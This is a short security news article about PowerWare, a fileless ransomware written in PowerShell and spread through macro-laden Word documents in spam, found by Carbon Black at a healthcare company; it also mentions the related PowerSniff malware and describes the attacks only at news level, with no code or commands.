US-based security firm, Carbon Black has discovered new
ransomware variant known as PowerWare.
The ransomware discovered a week ago targeted a company in
the healthcare industry.
As with all ransomware families identified this week, this
one has a kink of its own and its mode of operation has never been seen before
in other ransomware strains.
PowerWare is different from other crypto-ransomware samples because
it is fileless, which is a tactic adopted by other malware families pushed in
prolific exploit kits such as Angler.
The PowerWare ransomware is written completely in the
Windows PowerShell scripting language. It uses a combination of Word files,
macro scripts, and PowerShell scripting language to infect victims with its
deadly payload.
PowerShell is a task automation and configuration management
framework that's included in Windows and is commonly used by systems
administrators. It has its own powerful scripting language that has been used
to create sophisticated malware in the past.
In spite of its innovative methods, the ransomware still
relies on old-school infection tactics that starts with spam email arriving in
the victim's inbox. Emails contain Word documents with malicious macros which
is an increasingly common attack technique.
Once enabled, the macro opens cmd.exe, which then calls
PowerShell, a native Windows framework that uses a command-line shell to manage
tasks, to download a malicious script. The use of PowerShell avoids writing
files to the disk and allows the malware to blend in with legitimate activity
on the computer.
PowerWare uses PowerShell to ultimately encrypt files stored
on the machine once it’s compromised.
Once everything is encrypted, the ransom note is displayed
on the victim’s screen asking them for $500 bitcoin in exchange for the
encryption key; the ransom, however, goes up to $1,000 two weeks after
infection.
The use of macros to push malware, meanwhile, has enjoyed resurgence
in the last six months, not only with ransomware, but also banking malware such
as Dridex. Macros, however, are disabled by default on Windows machines.
As for PowerSniff, discovered by Palo Alto, it uses macros
to initiate a PowerShell instance which then downloads shellcode that writes
the Ursnif point-of-sale malware directly into memory.
Both companies have published indicators of compromise for
the respective malware families.
Multiple hospitals have recently fallen victim to ransomware
attacks.
Attackers are not through testing the limits of what they
can do with new features in ransomware samples.